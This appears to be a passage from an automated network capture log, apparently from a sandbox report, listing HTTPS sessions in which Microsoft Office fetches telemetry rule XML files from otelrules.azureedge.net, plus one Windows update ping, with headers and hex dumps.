                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120835Z-16849878b78p8hrf1se7fucxk800000007cg000000007u5f
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    95192.168.2.56046313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 3342
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                    x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120835Z-16849878b78p49s6zkwt11bbkn0000000650000000009535
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    96192.168.2.56046413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 2284
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                    x-ms-request-id: fb8efb24-701e-0050-0ba3-266767000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120835Z-16849878b78wv88bk51myq5vxc00000006sg0000000093cd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    97192.168.2.56046513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:36 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                    x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120836Z-16849878b786jv8w2kpaf5zkqs00000005f0000000002mxx
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    98192.168.2.56046613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:36 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                    x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120836Z-16849878b78wv88bk51myq5vxc00000006t0000000008d26
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    99192.168.2.56046720.109.210.53443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC124OUTGET /sls/ping HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    User-Agent: DNS resiliency checker/1.0
                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC318INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    MS-CV: soBrMbw83EWwpiYD.0
                                                                                                                                                                                                                                                    MS-RequestId: 6154616d-ed65-4d10-8aa5-cff6c5b78891
                                                                                                                                                                                                                                                    MS-CorrelationId: c96fa449-2a57-4bae-8c01-ffabc64e5e29
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    100192.168.2.56046813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:36 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                    x-ms-request-id: b981dc60-601e-0097-7636-29f33a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120836Z-15b8d89586flzzksdx5d6q7g1000000001m0000000008zvk
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    101192.168.2.56046913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:36 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                    x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120836Z-16849878b78hh85qc40uyr8sc800000006qg00000000dabf
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    102192.168.2.56047013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:36 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                    x-ms-request-id: 1b4bca5c-501e-000a-63e3-260180000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120836Z-17c5cb586f6wnfhvhw6gvetfh4000000060g0000000020nx
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    103192.168.2.56047113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                    x-ms-request-id: d8669f86-801e-0083-53a9-29f0ae000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-17c5cb586f6mkpfkkpsf1dpups00000001u0000000006203
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
